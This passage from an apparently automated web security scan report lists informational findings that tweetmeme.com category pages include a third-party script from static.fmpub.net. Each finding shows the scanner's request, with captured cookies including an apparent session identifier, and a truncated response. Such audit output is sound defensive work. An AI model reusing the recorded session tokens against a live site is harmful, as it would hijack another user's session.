<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.373. http://tweetmeme.com/category/gaming-pcgames

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/gaming-pcgames

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-pcgames HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:43 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0083482265472412
X-Served-In: 0.89368987083435
X-Served-By: h04
Content-Length: 49095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
PC
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.374. http://tweetmeme.com/category/gaming-playstation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/gaming-playstation

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-playstation HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:24:03 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0061628818511963
X-Served-In: 0.060573101043701
X-Served-By: h00
Content-Length: 59181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Pla
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.375. http://tweetmeme.com/category/gaming-webgames

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/gaming-webgames

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-webgames HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:24:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026149749755859
X-Served-In: 2.949609041214
X-Served-By: h01
Content-Length: 26346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Web
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.376. http://tweetmeme.com/category/gaming-xbox

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/gaming-xbox

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-xbox HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:24:54 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.04665994644165
X-Served-In: 0.13526082038879
X-Served-By: ded2062
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Xbo
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.377. http://tweetmeme.com/category/lifestyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/lifestyle

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:25:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0062718391418457
X-Served-In: 0.050257921218872
X-Served-By: h00
Content-Length: 55356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Lif
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.378. http://tweetmeme.com/category/lifestyle-autos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/lifestyle-autos

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-autos HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:25:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045361518859863
X-Served-In: 0.055244922637939
X-Served-By: h03
Content-Length: 54705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Aut
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.379. http://tweetmeme.com/category/lifestyle-educational

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/lifestyle-educational

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-educational HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:26:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036990642547607
X-Served-In: 0.072364807128906
X-Served-By: ded2060
Content-Length: 56711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Edu
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.380. http://tweetmeme.com/category/lifestyle-events

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/lifestyle-events

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-events HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:26:18 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0086851119995117
X-Served-In: 0.57426810264587
X-Served-By: ded2059
Content-Length: 54486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Eve
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.381. http://tweetmeme.com/category/lifestyle-fooddrink

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/lifestyle-fooddrink

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-fooddrink HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:27:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044460296630859
X-Served-In: 1.2629458904266
X-Served-By: h00
Content-Length: 53613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Foo
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.382. http://tweetmeme.com/category/lifestyle-health

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/lifestyle-health

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-health HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:27:10 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0039830207824707
X-Served-In: 0.049233913421631
X-Served-By: h01
Content-Length: 54626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Hea
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.383. http://tweetmeme.com/category/lifestyle-travelplaces

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/lifestyle-travelplaces

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-travelplaces HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:27:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038809776306152
X-Served-In: 2.3244588375092
X-Served-By: ded2060
Content-Length: 55377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Tra
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.384. http://tweetmeme.com/category/science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/science

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/science HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:28:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0070600509643555
X-Served-In: 0.056226015090942
X-Served-By: ded2059
Content-Length: 55531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Sci
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.385. http://tweetmeme.com/category/science-enviroment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/science-enviroment

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/science-enviroment HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0048539638519287
X-Served-In: 0.05054497718811
X-Served-By: ded2059
Content-Length: 55625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Env
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.386. http://tweetmeme.com/category/science-space

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/science-space

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/science-space HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:09 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0040388107299805
X-Served-In: 0.050357818603516
X-Served-By: h04
Content-Length: 54977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Spa
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.387. http://tweetmeme.com/category/sports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:27 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042898654937744
X-Served-In: 0.050817966461182
X-Served-By: ded2061
Content-Length: 55565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Spo
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.388. http://tweetmeme.com/category/sports-baseball

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-baseball

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-baseball HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:33 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0052142143249512
X-Served-In: 0.096256017684937
X-Served-By: ded2061
Content-Length: 56296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Bas
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.389. http://tweetmeme.com/category/sports-basketball

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-basketball

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-basketball HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

